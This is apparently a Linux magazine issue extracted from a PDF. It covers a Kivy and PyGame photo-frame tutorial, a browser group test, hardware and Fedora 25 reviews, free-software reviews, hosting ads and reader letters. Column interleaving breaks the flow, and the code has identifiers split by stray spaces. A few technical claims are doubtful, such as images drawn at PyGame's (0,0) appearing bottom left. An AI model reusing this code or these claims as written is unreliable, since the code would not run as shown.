App class to create the graphical interface. The core of the Python script would contain the following code use. In this case, you would want to use the following code in_file = open('filelist.txt') temp = in_file.readlines() in_file.close() filelist = [] for line in temp: filelist.append(line.strip()) We need to use the strip method because the readlines method of the file object includes the newline character at the end of each line. We need to remove these before we can use them later on when we go to load the images. The next step is to actually display the images. The simplest method is to just pop them up on the screen, one at a time. But this is a bit boring. Instead, we could use the available Carousel object to handle transitioning the images from one to another. The following code shows how to create this type of display. sudo pip install kivy) The commented section of this core code is where we will need to put all of the 78 import kivy from kivy.app import App from kivy.uix.image import Image from kivy.uix.carousel import Carousel from kivy.clock import Clock class PhotoFrameApp(App): carousel = Carousel(direction='right', loop='true') def my_callback(self,dt): self.carousel.load_next() def build(self): # Use the filelist generation method of choice for curr_image in filelist: image = Image(source=curr_ image) self.carousel.add_ widget(image) Clock.schedule_interval(self. my_callback, 2.5) return self.carousel if __name__ == '__main__': PhotoFrameApp().run() In the previous code, the carousel object was set to loop. This means that when you reach the end of the list of images, it will simply loop back around to the beginning of the list, continuing forever. The next portion defines the callback for the updating of the carousel. It simply calls the 'load_next()' method of the carousel to pull up the next image on the list. In the 'build()' method, the first step is to create the list of image filenames. You could use either of the methods suggested earlier, or one of your own devising. Once you have that list, you can loop through each of them and create a new Image object for each of them. These new Image objects are added to the carousel with the 'add_widget()' method. The last step in the 'build()' method is to create a schedule using the Clock object. Using the 'schedule_ interval()' method, this code will change the image every 2.5 seconds. This method is good as a first start, but what if you want a more interesting transition between images? This can be done by using another set of classes called Screen and ScreenManager. If your list of images don't take up too much RAM, you can simply create a new Screen object Python column Can you use PyGame instead? for each image. The following code is an example of how you could do this: import kivy from kivy.app import App from kivy.uix.image import Image from kivy.uix.screenmanager import Screen,ScreenManager,FadeTransition from kivy.clock import Clock class PhotoFrameApp(App): sm = ScreenManager(transition=Fad eTransition()) curr_screen = 0 num_screens = 0 def my_callback(self,dt): self.sm.current = str(self. curr_screen) if self.curr_screen == self. num_screens-1: self.curr_screen = 0 else: self.curr_screen = self.curr_ screen + 1 def build(self): # Create the list of files in list filelist self.num_screens = len(filelist) for i in range(self.num_ screens): image = Image(source=filelist[i]) screen = Screen(name=str(i)) screen.add_widget(image) self.sm.add_widget(screen) Clock.schedule_interval(self. my_callback, 2.5) return self.sm if __name__ == '__main__': PhotoFrameApp().run() As you can see, there is a bit more involved in creating the screens and adding the images than in the previous example. When you loop through the list of image files, you need to create a new Image widget. You then create a new Screen widget and add the Image widget as a child. The last step is that you need to add the new Screen widget to the ScreenManager object that was created at the top of the class. We reuse the 'schedule_interval()' method to have the screens transitioning every 2.5 seconds. The callback function needs to be changed, though. The ScreenManager has an attribute, named 'current', that identifies which screen is the one being displayed. When you change what is identified by the current attribute, the two images are changed using the transition method that was defined when you created the ScreenManager object. If you are using the latest version of Kivy, there is a new method available, called 'switch_to()'. In this case, you don't need to add the Screen objects as widgets to the ScreenManager object. The 'switch_to()' method removes the current displayed screen and adds the new screen, applying the transition method being used. The version of Kivy available in the Raspbian package repository is older, so we’ve used the older method for managing screens. The previous example used the FadeTransition method to move from one screen to another. The other transitions available are, variously, NoTransition, SlideTransition, SwapTransition, WipeTransition, FallOutTransition and RiseInTransition. If you want to have even more variety in your image display, you can change the transition method for each method by changing the attribute 'transition' for the ScreenManager object. This code only displays the images, but that isn't the only thing you can do. You could also create an interactive photo frame that you can use to manipulate the pictures, if you have a touch screen as the display. As the code is written above, you can swipe back and forth to display other images. If you remove the 'Clock.schedule_ interval()' command, then the image display will stay static unless you swipe to change the image being displayed. Also, there is a widget, called 'Scatter', that you can load the picture into before adding to the screen objects. The Scatter class allows you to use multi-touch to rotate the image, stretch it or shrink it. This might be handy if you wanted to create a photo album application rather than a photo frame display. Hopefully, this has sparked some interest in looking at what can be done with such a powerful framework. Of course, Kivy is not the only framework that you could use to create this image display. As another example, we will look at how you could use PyGame to do a similar job of showing a series of photos on a Raspberry Pi display. import pygame pygame.init() display_width = 800 display_height = 600 gameDisplay = pygame.display.set_ mode((display_width,display_height)) black = (0,0,0) white = (255,255,255) clock = pygame.time.Clock() # Create the filelist image list def img_swap(x): gameDisplay.blit(filelist[x], (0,0)) finished = False x=0 while not finished: for event in pygame.event.get(): if event.type == pygame.QUIT: finished = True gameDisplay.fill(white) img_swap(x) pygame.display.update() if x == len(filelist)-1: x=0 else: x = x+1 clock.tick(60) pygame.quit() quit() As you can see, this code is a bit more low-level. The commented line is where you would place the code that creates the list, named 'filelist', that has the filenames for all of the pictures that you wanted to use as part of the display. To display the image is a two-step process. You first need to fill the window with white to essentially erase the currently displayed image. Then the function 'img_ swap()' uses the 'blit()' method to copy the image data to the physical display. Again, to keep the code simple, we used (0,0) as the origin to start the drawing of the image. But this means that all of the images are displayed in the bottom left-hand corner. You would probably want to add code to the function in order to figure out the coordinates to use as an origin to put your image in the centre of the window. PyGame also has a clock object that you can use to trigger the swapping of the images on a regular schedule. 79 From the makers of Python The Discover this exciting and versatile programming language with The Python Book. You’ll find a complete guide for new programmers, great projects designed to build your knowledge, and tips on how to use Python with the Raspberry Pi – everything you need to master Python. Also available… 81 Group test | 86 Solwise PL-1200AV | 88 Fedora 25 | 90 Free software Midori Chrome Firefox QupZilla GROUP TEST Web browsers Is Chrome still the cream of the crop when it comes to modern, open-source web browsing? Midori Chrome Firefox Midori is considered one of the fastest, cutting edge browsers out there, offering users the latest web tech and extension system to help make the browser their own. It’s comparable to Chrome in a lot of ways, but does it do enough to stand out from its shadow? midori-browser.org The continuous developments behind Chrome have helped it become one of the biggest most widely used web browsers today. Combining simplicity with usability has been at the heart of its growth, but it’s also helped propel its competition to improve dramatically as well. QupZilla One of the reasons Firefox’s reputation continues to grow is due to its customisation offerings. Many parts of the browser can be tailored to suit your needs, and because of it, there’s been some fantastic spin off products made. Can it claim top spot in this group test, however? QupZilla introduces some interesting concepts. It uses a unified library mode, helping keep your bookmarks, history and RSS feeds in a single window. Plus, with AdBlock integrated as standard, could QupZilla cause an upset for its bigger rivals? 81 Review Web browsers Midori Chrome Lightweight, fast and always on the cutting edge of web developments Is the king of browsers still managing to hold on to its crown? n Midori will work a vast selection of search engines, with an installer on hand to help you switch when necessary n Extensions vary in their use, with some acting as standalone functions and others offering links to current apps Browser design Browser design The coding behind Midori is fantastic, giving it a beautiful design throughout. Everything from bookmarks to tabs is controlled through a single menu, so you won’t find any complex windows to navigate through. Best of all, its design carries through each and every Linux distribution, so you’re guaranteed the same experience every time. From the outset, Chrome looks like a relatively minimal browser, utilising a single bookmark manager as its single standout noticeable feature. One caveat is that it does get a little complicated when you start digging through its menu systems, of which there any many. You’ll find everything you could need for a good browsing experience buried here, however. Web performance Web performance Management and settings Management and settings Speed is of the essence, and we’d go on record and say it’s faster than Chrome. At its core is a lightweight webkit rendering engine, which makes loading speeds lightning-quick. It’s even above average for image and videoheavy webpages, so it’s a great all-rounder. Midori really shows off the benefits of what a lightweight design can do for performance. Having the power of Google behind it has helped Chrome tremendously. Whatever you throw at it is handled with the utmost ease, no matter the media content within. What’s particularly enjoyable about using Chrome is how it deals with older websites, performing on-the-spot checks for corrupt code and altering the loading process to cater for it. Many of Midori’s core settings are ideal for tailoring privacy, but there’s little on offer for browser security. It’s an annoyance, but it would counteract the browser’s lightweight build. We did like, however, Midori’s bookmarking suite, which can be used to tailor for different site combinations and even create a quick load list. Chrome has one of the best bookmark management tabs out there, enabling them to be integrated throughout your desktop and beyond. Alongside that, its History tab is packed with great features to help manage previously visited sites with ease, and even export them if needed. The amount of choice on offer is a bit overwhelming for new users, however. Plugins and extras Plugins and extras One of the better extras on offer in Midori is its built-in downloader, a perfect accompaniment when it comes to on-the-spot file downloads. It can be a little clunky with media files, but it’s a small issue. Other extras are minimal in choice, but both the RSS feed manager and spell checker are helpful additions for most users. There’s room for more options here, however. We’d say that part of Chrome’s appeal is through its experimental feature page. There’s a lot of developmental features here that can be integrated into your browser. Of course, some of them can make your browser unusable, but some are fantastic additions. Away from that, Chrome’s Web Store has some impressive tools that can also be implemented into the browser. Overall Overall Midori burns up the rest of the field when it comes to its speed, and while a few options are missing, this is a lightweight distribution that seriously challenges Chrome’s crown in most areas. 82 8 Chrome still remains one of the best browsers out there. With the Google juggernaut behind it, updates are thick and fast, keeping up to date with the latest must-have web trends. 9 Firefox Mozilla’s browser continues to make waves in its field QupZilla Fairly new on the scene, does QupZilla deliver a great browsing experience? ■ Add-ons allow you to customise how some of the core functions with Firefox actually work. They vary in their success and usability ■ Native ad-block support is great and even better is that users can configure the blocker to their exact tastes and requirements Browser design Browser design Out of all the browsers featured here, Firefox takes the most time to get used to. That’s not to say it’s bad by any means, but a lot of core tools are in different locations than some users would normally think to look for them. However, several of the browser’s key components can be customised, which is a big plus when compared to the competition. Web performance Firefox’s performance is generally impressive, but it can feel a little sluggish at times. The crux of this issue usually stems from the plugin menu, which you’ll need to keep a close eye on. Despite this, Mozilla’s backing does help Firefox’s reputation as one of the more file-friendly browsers out there, so integrating your day-to-day life with the web is easier than you might think. Management and settings Managing your various social accounts through one menu within Firefox is a particular highlight, and we wish it was something that other browsers looked to implement into their offerings. Settings choices aren’t as fully featured as those that Chrome offers, which we do actually prefer, but those wanting to experiment with their browser may be left disappointed. Plugins and extras QupZilla’s core design utilises many elements from some of the other browsers featured here. That’s not a bad thing by any means, but it’s hard to pinpoint the areas that really help make it stand out from the crowd. The minimal design is easy to navigate, menu systems are easy to identify and tools are labelled correctly. We just wish there was some more originality here. Web performance Browsing the web is a pleasure with QupZilla, with loading speeds not hindered by pointless animations and other superfluous extras. What we would recommend, however, is that you avoid the custom theme library, as we found some issues with the browser crashing when we looked to implement one of them. Apart from that, all is good here. Management and settings QupZilla unifies bookmarks, history and RSS feeds into one place, doing away with multiple windows. For end users, it proves to be a helpful addition, allowing complete control of the ins and outs of the browser in one place. Another nice addition is the ability to import bookmarks from other browsers, despite it being a little buggy at times. Plugins and extras Firefox offers its Private Browsing with Tracking Protection combo as a one-stop tool to help you browse the web anonymously, and in practice, it works an absolute treat. We also really liked its intelligent search system that looks to utilise its knowledge on your searches and site visits to recommend things that you may want to view and read. There aren’t too many extras to speak of in QupZilla, but a couple do shine through. Integrated ad-blocking software is a featured point of the browser, enabling users to identify the sites they’d like to prevent displaying adverts. There’s also a self-styled ‘speed dial’ that can be used to load webpages faster, but again, it was a little buggy during testing. Overall Overall A lot of Firefox’s extras will be a big incentive for users to check out, and rightly so. It does miss some core settings we’d like to have seen, but this is still a highly usable browser. 7 Despite some positives, QupZilla still has some annoyances in other areas. We must point out that this is still a growing project, and we recommend paying close attention to it over the coming months. 7 83 Review Web browsers In brief: compare and contrast our verdicts Midori Browser design A crisp and clean design carries through well on a host of Linux distributions Web performance Capable of fast loading times thanks to its lightweight build qualities Management settings Tailored for privacy, but lacking in core browser security for the most part Plugins and extras Lacking in certain options, but a built-in downloader is a great added bonus Overall A few omissions here and there, but this is the closest Chrome beater we’ve found Chrome 9 Minimal from the outset, but overly complicated when digging through the settings 9 Deals with any task with consummate ease, especially older websites that lack advanced code 7 Chrome sports one of the best bookmark and history management windows out there 7 Hundreds of experimental features are on hand so you can experiment with Chrome’s capabilities 8 The gap between Chrome and other browsers is getting smaller, but it’s still the king here Firefox 7 Its design is a little different from the rest, which can take a little time to get accustomed to 9 While integrating files into Firefox is simple, it can feel a little sluggish from time to time 8 Settings are more refined than other browsers, with only the best options showcased 10 9 A handy Privacy Browsing and Tracking Protection combo is a particular highlight here Firefox is a solid alternative to Chrome, but we do prefer what Midori offers QupZilla 6 A blend of other browser features helps give QupZilla a good look overall 7 6 Browsing speeds are fast, as long as you avoid the slowdownridden custom themes 8 9 QupZilla unifies your bookmarks, RSS feed and web history in one manageable menu 8 8 Integrated ad-blocking software is useful, but you can find extensions that are better 6 7 A functional browser that’s missing the wow factor that other browsers have 7 AND THE WINNER IS… Chrome Yes, Chrome is still the best browser around, but it’s nowhere near as superior as it once was. One of the best things about doing this group test was being able to see first-hand how major developments in opposing browsers is quickly closing the gap on Google’s juggernaut. Midori was a particular highlight, offering a relatively minimal take on the browsing experience, while still boasting an impressive suite of features and quick loading times. We’d love to revisit this group in six months and see if anything has changed. As it stands, Chrome still sits at the top of the pile. While its core browsing experience isn’t anything out of this world, it’s the embedded extras that really set it apart. For one, the Chrome Web Store has come on leaps and bounds in recent years, with thousands of extensions now available for users to expand on their Chrome experience. Best of all, many of these are completely free and offer quick links to some of your most used apps. Similarly, for budding tinkerers out there, the experimental features menu remains a hidden treasure trove. While many of these features aren’t yet ready for public consumption, some can be integrated into the browser with absolute ease. 84 n Implement extensions to improve and expand on your current Chrome experience What’s even better is that some of these can be edited and tailored to your own Chrome download, so the choice is really down to you. Chrome has held off against some stiff competition in its time, and it’s testament to the continued support from Google that it remains at the top. Frequent updates are helping plug any holes, while a growing community is helping to provide instant feedback and bug reports when needed. Midori is a worthy runner-up, but it’ll take some doing to dethrone the king. Oliver Hill 01202 586442 To advertise in Classified Advertising Review Solwise PL-1200AV2-PIGGY HARDWARE Solwise PL-1200AV2-PIGGY Faster and more reliable than Wi-Fi, this advanced Powerline adaptor is ideal for 4K streaming Price £47 each Website Specs Qualcomm Atheros QCA7500 chipset Pass-through socket with noise filter 28-bit AES Link Encryption 86 Home networks are facing growing demands as 4K media streaming home servers, games consoles and an ever-increasing number of internet-connected devices become commonplace, while our walls stay as thick as ever. While AC Wi-Fi routers offer one way to bolster signal, and Ethernet cables are there for those that want to snake cables through their houses, Powerline adaptors offer a third way. For those unfamiliar with Powerline (also known as HomePlug), this technology turns your home’s electrical wiring into a network, transmitting data packets through the higher frequencies your wires support and your 50/60Hz electrical power isn’t using. Solwise’s PL-1200AV2-PIGGY Powerline adaptor is up there, promising Gigabit speeds with transfer rates up to 1200Mbps. During our speed tests, we found the adaptor didn’t quite live up to these grand claims, but still managed to trounce our home Wi-Fi, with setup that couldn’t be simpler. The PL-1200AV2 uses the latest Qualcomm Atheros QCA7500 chipset, designed specifically for Powerlines, and offers enhanced processing power, employing MIMO (multiple input multiple output), which offers eight spatial streams, the same as an AC router. This means it has much more spectral bandwidth to play around with, which Pros Easy to set up and pair, it boasts some high-end features for a reasonable price and delivers impressive performance It has much more spectral bandwidth to play around with, which allows it to deliver larger data streams, making it ideal for 4K Netflix allows it to deliver larger data streams, making it ideal for 4K Netflix. The PL-1200AV2 also has two Gigabit Ethernet ports, so that you can run multiple devices off the one adaptor. These are located on the bottom of the adaptor, which is arguably more aesthetically pleasing, but isn’t quite as easy to access. Unlike some Powerline accessories, this adaptor also has a pass-through socket, so you can continue to use it as a power source (Apparently, this is the source of the ‘PIGGY’ name; it’s like ‘piggyback’). The pass-through socket is also filtered to help reduce mains noise, if that’s something that bugs you. Something of more significance, though, the PL-1200AV2’s security is supported by 128-bit AES Link Encryption to keep out eavesdroppers and hackers. However, while some similarly priced Powerline adaptors, including models from Devolo and TP-Link, include a Wi-Fi transmitter so you can create a hotspot around your socket, this is a feature sadly lacking from the PL-1200AV2. Setting up the PL-1200AV2 is almost a case of plugand-play thanks to the QuickConnect button. Like any Powerline network, you require at least two adaptors (so expect to pay £94 to start using the PL-1200AV2, rather than just £47). Plug one into the socket nearest your router, which you can then hook up to the internet using one of the Ethernet ports. Place your second adaptor anywhere in your house where you will need reliable internet. Then you have the option to use Solwise’s free installation software to set up a network, but it’s much easier to just press the button on the PL-1200AV2 to pair them and watch the LEDs flicker to confirm it. As we said, in terms of actual performance, our speed test results were nothing like the 1, 200Mbps promised on the box. We didn’t actually expect this, as that’s a theoretical max speed only. The reality was 385Mbps, which we still consider impressive when compared to the 20 to 90Mbps Powerline tech was offering just a couple of yearsago.Themaxpingwas3ms,whichwillnodoubtappeal to online gamers. The PL-1200AV2 also uses enhanced Quality of Service (QoS), so it will prioritise bandwidth for multimedia payloads – like online gaming, 4K TV and VoIP calls – for smoother streaming. However, the advantage of Powerline is not really speed, but distance. You can use one PL-1200AV2 adaptor on your ground floor and another in your attic without worrying about loss of signal. Jack Parsons Cons In our tests, it didn’t deliver anywhere near the maximum 1, 200Mbps speed. You’ll also need to shell out for at least two adaptors for it to work Summary While it doesn’t live up to its name’s claim, the Solwise PL-1200AV2-PIGGY delivers near 400Mbps speeds that are still incredibly impressive. It’s also almost a third of the price of many Gigabit Powerline adaptors, while still offering high-quality features, including its Atheos processor, added encryption and enhanced QoS. 8 87 Review Fedora 25 DISTRO Fedora 25 Can Fedora’s latest update turn the tables on the competition? RAM 1GB Storage 10GB drive space (20GB recommended) Specs 1GHz processor (1.4GHz recommended) 88 For many users coming over to Linux for the first time, Fedora has been one of the leading lights to help guide them on their path. Notorious for being highly usable and boasting a fantastic community, continuous developments have helped propel it to one of the premier offerings available for download. Its latest release, Fedora 25, blends together a suite of new features, mixed in with some improvements to help core stability as well. As ever, Fedora has released three editions of the distribution, each tailored to a specific use and stemming from a base package. Fedora 25 Atomic Host (replacing Cloud), Server and Workstation have all had some noticeable enhancements. Each edition has an underlying foundation of features that they all use in their own way. One of these inclusions is Docker 1.12 integration, which finally makes the transition across to Fedora. It’s an ideal solution for building and running container-based applications, and benefits from the low-resource build of each edition of Fedora. One of the issues in previous versions of Fedora was its Docker 1.12 integration finally makes the transition across to Fedora sometimes problematic system programming language, but we’re glad to say this is a thing of the past thanks to the inclusion of Rust. Albeit not overly well-known, Rust’s integration helps eradicate any and all stability issues faced previously; another welcome addition, we must say. Moving into Fedora Workstation, arguably the biggest addition here is with GNOME 3.22. There’s an abundance of subtle interface improvements, and we particularly like the all-new keyboard settings tool. For developers making changes on the fly, this is a helpful asset to have around. Window management has also seen some enhancements, and while cosmetically you’ll be hard pressed to really spot any differences, being able to multi-select files and systematically edit metadata through certain key bindings proves to be a big help. You’ll also now find decoding support for MP3 files, but this seemed to be hit-and-miss with its end results during our time with it. Thankfully, users can find alternatives for download through the software centre. Fedora Server’s faithful Cockpit system has seen a variety of changes, with a new SELinux Troubleshooter module on hand to help diagnose problems. Due to the complexities of Server as a whole, this module is ideal for finding and fixing faults effortlessly. There were a few instances when we relied on SELinux to figure out an issue and it solved it with consummate ease. The jury is still out on how it’ll handle more advanced failures, however. Dig a little deeper and users can also find admin support for SSH keys, enabling users to systematically track connected machines at any time. We did find some initial slowdown with this feature, but to our knowledge, this seems more a hardware fault than anything with the software itself. Fedora Atomic is an entirely new flavour for Fedora and first impressions are positive. There are ways throughout to help create and deploy container-based workloads, linking in well with the Docker integration mentioned previously. While this edition perhaps lacks the high-quality Fedora finish we’ve become accustomed to, a two-week update cycle is a surprising and welcome twist. We’ll reserve judgement until the first point updates have been released. We have to say that the Fedora team has seriously done a tremendous job here. Each of these editions has upped our expectations of what Fedora is capable of, and despite some small flaws, it certainly feels like a near-complete update. The premise of dropping Fedora Cloud and subbing in Fedora Atomic is a potentially risky move, but early signs are that Atomic is certainly up to scratch. If you’ve been biding your time to check out Fedora, now is the perfect time to do so. Beginner users should arguably start by using Workstation to get used to the nuances that Fedora offers, while advanced users should pick and choose the edition that suits them best. Oliver Hill Pros Most new additions have dramatically improved the user experience, with bug fixes helping to fix previous problems. Cons Integration of certain tools can be hit-and-miss and we’d love to see more crossover between the three distinct versions of Fedora 25. Summary Core changes to the Fedora brand are fantastic and while none are perfect, each individual addition is certainly worth taking the time to check out. 9 89 Review Free software RTS GAME 0 A.D. Alpha 21 Ulysses From Carthaginians to Romans, rewrite ancient history If you ever doubt that the human race takes play seriously, take a look at the amount of hours that go into the collaborative development of open source games. Since the previously access-to-code-byinvitation game was relicensed under the GNU GPL in 2009 development has accelerated, and releases have been made regularly. 0 A.D. is still in alpha, but it’s very playable, and well worth investing a little time in, whether you like RTSes, or are just interested in this historic period. Unlike computing, calendars count from 1, and there was no year zero - hence the licence to adopt the name, and play a little fast and loose with history, where gameplay demands sacrifices in accuracy. The interface lets you get straight to playing, with sensible defaults already selected, so that there is no need to make decisions about things you don’t yet understand. The in-game manual will also help to keep you Above You start with an acropolis, and resources nearby, but will you emulate the success of ancient Athens? going as you marshall resources, and build alliances, to try and emerge victorious on the Attic plains. Players need to keep on top of military campaigns Great for… A lot of yet-to-be implemented Good graphics, sound, and and defence, while building up enough resources to Having fun while pretending to features, so you may be game progression. Online be learning history advance from village to town – and eventually city – playing Age of Empires for a multiplayer options. Regular play0ad.com/ unlocking technological advances along the way. little while yet. improvements and updates. Pros Cons INTERACTIVE DRAWING LIBRARY Quil 2.5.0 Art from code, and it can run in your browser, too Normally we have a screenshot for graphics apps that we review, but since Quil is a library for interactive drawings and animations, the page won’t bring them to life as well as you visiting the project’s homepage or, better yet, running the software. Why would you? Well, Quil mixes Processing – an artistfriendly API – with Clojure, a language so hot that you’re seriously running out of excuses not to at least give it a try. Real soon. As with all things Clojure, Lein makes for the simplest of installs – lein new quil my-sketch, then open the generated core.clj file up in your favourite Clojure friendly editor (Emacs or Lighttable), and evaluate the file. The website is full of examples, as 90 well as links to tutorials, and a chance to try online. Speaking of online, Quil also works with ClojureScript (using Processing.js), so sketches can be run directly in your web browser. If you know Processing, it’s a little disconcerting to see it getting an attack of the parentheses to fit the Clojure world, but the examples are helpful here in getting you acclimatised – try Grey Circles on Quil’s GitHub page. Quil can be expanded with middleware, such as Navigation 3D, which allows shooter-like navigation through 3D spaces. Sketches can also be made into runnable jars, for carrying to anywhere running the JVM. Fun and useful, what more could you want? Pros Update functions (and therefore animations) without restarting; make art from maths! Cons It’s not pure Processing, and Clojure is a big shock to newbies (until they love it!). Great for… Enlivening presentations and pepping up websites quil.info/ HIDS Samhain 4.2.0 Don’t rely on luck to protect your servers - install a host-based intrusion detection system Security - you know you need it, but something always gets in the way. If you have one, two or a handful of VPSes, and perhaps an internet-facing server or two at home – don’t forget to count that Raspberry Pi project - you’ll have at least thought about security, probably even have a firewall, and maybe even do daily software updates, but you’ll have been far too busy to get serious about Intrusion Detection software. Well, stop prevaricating, postponing and procrastinating, and take a look at Samhain. One of the best host-based intrusion detection systems (HIDS), Samhain sits stealthily on your system monitoring packets and detecting file modifications – as well as searching for rootkits and detecting rogue SUID executables. It can run as a standalone monitor on a single server, or monitor multiple hosts, logging centrally – with all logs sent signed and encrypted, naturally. Packages are in most repositories, but distros may have compiled Samhain without a feature you need, so consider downloading the source; Samhain provides instructions for checking its integrity. Dependencies are minimal for reasons of security, but it makes for an easy compile. The real work starts when you open /etc/ samhainrc in your favourite editor: time to read through the weighty manual. The terse man page is a useful guide to many parts of Samhain, including running in stealth mode, with config hidden by steganography. Pros Powerful and flexible Intrusion Detection System; the only serious rival to OSSEC. Cons To get the most from it you’ll have to spend a lot of time reading the comprehensive manual. Great for… Stop worrying about your server, and sleep soundly! la-samhna.de/samhain/ TERMINAL CLIENT lterm 1.4.1 Manage all of your remote terminal sessions with lterm If you regularly shell into remote machines, but are not using a tool for transparent sessions across networks like MC or Emacs’ TRAMP mode, then you may be fed up of dealing with remembering the log-in details, and the extra work involved in file transfers. Enter lterm, a terminal emulator based on VTE with plenty of features to make you life easier. As well as the standard bells and whistles of tabbed sessions, working remotely (SSH, sftp, or even telnet) is facilitated by bookmarks, encrypted password saving (and authentication by key), and remote file and directory management. X11 forwarding can also be carried out over SSH sessions. There are some editing features, and plenty of configuration options such as customised mouse behaviour, for those with a particular way of working. Additionally, users can send the same commands to clusters of remote servers or local desktop sessions - which is also an excellent way to step through parts of a shell script for careful testing of its effects on your servers. Very useful. Fairly regular releases, with attention to bug fixes as well as new features, means users can be confident that time invested in this app will not be squandered. Above lterm takes the pain out of remote working, giving you the best features of command line and GUI Pros Combines a good basic terminal client with convenient, time-saving features for working across networks. Cons It’ll never be as powerful as working across machines from Emacs, MC, etc – but does it need to be? Great for… Anyone with a remote session from VPS to Raspberry Pi. lterm.sf.net/ 91 OpenSource Get your listing in our directory To advertise here, contact Luke luke.biddiscombe@imagine-publishing.co.uk | +44 (0)1202586431 RECOMMENDED Hosting listings Featured host: 0845 527 9345 Cyber Host Pro are committed to provide the best cloud server hosting in the UK; we are obsessed with automation and have been since our doors opened 15 years ago! We’ve grown year on year and love our solid growing customer base who trust us to keep their business’s cloud online! What we offer • Cloud VPS Servers – scalable cloud servers with optional Cpanel or Plesk control panel. • Reseller Hosting – sell web and email hosting to your clients; both Windows and Linux hosting available. • Dedicated Servers – having your own If you’re looking for a hosting provider who will provide you with the quality you need to help your business grow then contact us to see how we can help you and your business! We’ve got a vast range of hosting solutions including reseller hosting and server products for all business sizes. dedicated server will give you maximum performance; our UK servers typically include same-day activation. • Website Hosting – all of our web hosting plans host on 2015/16 SSD Dell servers giving you the fastest hosting available! Testimonials 5 Tips from the pros 01 Optimise your website images When uploading your website to the internet, make sure all of your images are optimised for websites! Try using jpegmini. com software, or if using Wordpress install the EWWW Image Optimizer plugin. 02 Host your website in the UK Make sure your website is hosted in the UK, not just for legal reasons! If your server is overseas you may be missing out on search engine rankings on google.co.uk – you can check where your site is on www. check-host.net. 03 Do you make regular backups? How would it affect your business if you lost your website today? It is important to always make your own backups; even if your host offers you a backup solution 92 Having your own dedicated server will give you maximum performance; our UK servers typically include same-day activation it’s important to take responsibility for your own data. 04 Trying to rank on Google? Google made some changes in 2015. If you’re struggling to rank on Google, make sure that your website is mobile-responsive! Plus, Google now prefers secure (https) websites! Contact your host to set up and force https on your website. 05 Avoid cheap hosting We’re sure you’ve seen those TV adverts for domain and hosting for £1! Think about the logic... for £1, how many clients will be jam-packed onto that server? Surely they would use cheap £20 drives rather than £1k+ enterprise SSDs! Try to remember that you do get what you pay for! Chris Michael “I’ve been using Cyber Host Pro to host various servers for the last 12 years. The customer support is excellent, they are very reliable and great value for money! I highly recommend them.” Glen Wheeler “I am a website developer, I signed up with Cyber Host Pro 12 years ago as a small reseller, 12 years later I have multiple dedicated and cloud servers with Cyber Host Pro, their technical support is excellent and I typically get 99.9-100% uptime each month” Paul Cunningham “Me and my business partner have previously had a reseller account with Cyber Host Pro for 5 years, we’ve now outgrown our reseller plan, Cyber Host Pro migrated us to our own cloud server without any downtime to our clients! The support provided to us is excellent, a typical ticket is replied to within 5-10 minutes! ” Supreme hosting SSD Web hosting 0800 1 777 000 0843 289 2681 CWCS Managed Hosting is the UK’s leading hosting specialist. They offer a fully comprehensive range of hosting products, services and support. Their highly trained staff are not only hosting experts, they’re also committed to delivering a great customer experience and passionate about what they do. Since 2001 Bargain Host have campaigned to offer the lowest possible priced hosting in the UK. They have achieved this goal successfully and built up a large client database which includes many repeat customers. They have also won several awards for providing an outstanding hosting service. • Colocation hosting • VPS • 100% Network uptime Value hosting elastichosts.co.uk 02071 838250 ElasticHosts offers simple, flexible and cost-effective cloud services with high performance, availability and scalability for businesses worldwide. Their team of engineers provide excellent support around the clock over the phone, email and ticketing system. Enterprise hosting: | 0800 808 5450 Formed in 1996, Netcetera is one of Europe’s leading web hosting service providers, with customers in over 75 countries worldwide. As the premier provider of data centre colocation, cloud hosting, dedicated servers and managed web hosting services in the UK, Netcetera offers an array of services to effectively manage IT infrastructures. A state-of-the-art data centre enables Netcetera to offer your business enterpriselevel solutions. • Managed and cloud hosting • Data centre colocation • Dedicated servers • Cloud servers on any OS • Linux OS containers • World-class 24/7 support Small business host 0800 051 7126 HostPapa is an award-winning web hosting service and a leader in green hosting. They offer one of the most fully featured hosting packages on the market, along with 24/7 customer support, learning resources, as well as outstanding reliability. • Website builder • Budget prices • Unlimited databases • Shared hosting • Cloud servers • Domain names Value Linux hosting patchman-hosting.co.uk 01642 424 237 Linux hosting is a great solution for home users, business users and web designers looking for cost-effective and powerful hosting. Whether you are building a single-page portfolio, or you are running a database-driven ecommerce website, there is a Linux hosting solution for you. • Student hosting deals • Site designer • Domain names Budget hosting: Fast, reliable hosting | +49 (0)9831 5050 Hetzner Online is a professional web hosting provider and experienced data centre. • Dedicated and shared hosting • Colocation racks • Internet domains and SSL certificates • Storage boxes 01904 890 890 Founded in 2002, Bytemark are “the UK experts in cloud & dedicated hosting”. Their manifesto includes in-house expertise, transparent pricing, free software support, keeping promises made by support staff and top-quality hosting hardware at fair prices. • Managed hosting • UK cloud hosting • Linux hosting 93 OpenSource Your source of Linux news & views linuxuser@imagine-publishing.co.uk COMMENT Your letters Questions and opinions about the mag, Linux, and open source Above Make sure that you are the only one in full control by using sudo and su instead of root wherever possible Above MOFO Linux is an Ubuntu-based distro for those who are concerned about surveillance and censorship Privacy please Dear Linux User, It strikes me that, given the recent introduction of the so-called ‘Snooper’s Charter’ in the UK, the frankly ridiculous data breaches at Yahoo et al, and the constant news stories surrounding hackers, you should talk more about how ordinary users can protect our private data from those who want to get their hands on it. Nice shiny versions of Linux like Apricity and elementary, as featured in your recent issue, are all very well, but can they stand up to a dedicated mischiefmaker or state actor? I think not. Some guidance on Linux versions that can would be very much appreciated, not only by myself and others who are worried about our financial and data security, but for those in places where Big Brother’s watchful eye is a very real and present threat. Colin Farwig 94 Computer security has rarely been out of the news lately, which is why we decided to take an in-depth look at InfoSec this issue! But while our feature is packed with ways to lock down and test systems and networks, it’s geared more towards the sysadmins of the world and less to home users, who may not have either the time or the inclination to watch over logs and pen-test their own security strategies. Happily, there are some very good Linux distros out there that concentrate on privacy – the reason that we don’t include them on our disc is that, for maximum security, you are better off downloading and checking them yourself before installation. Tails () is the most well known privacy focused distro, Qubes OS () is another – Edward Snowden apparently swears by it. MOFO Linux () meanwhile, is especially designed to counteract state surveillance and censorship, for those in countries where this is a concern. The good thing about the latter is that it’s Ubuntu-based, so it works smoothly and offers an easy learning curve, making it suitable for those who aren’t technically adept but still need to protect their privacy. Who do sudo? Hello Linux User team, I’m new to Linux, so forgive me if this is a stupid question, but what is the difference between sudo and root? I get that root is the equivalent of the Windows or Mac administrator account, the one that can do everything, but sudo seems to allow just as much power over commands, yet I often read things that say it’s better to sudo something rather than root it. Surely they both essentially do the same thing? And if root is the administrator 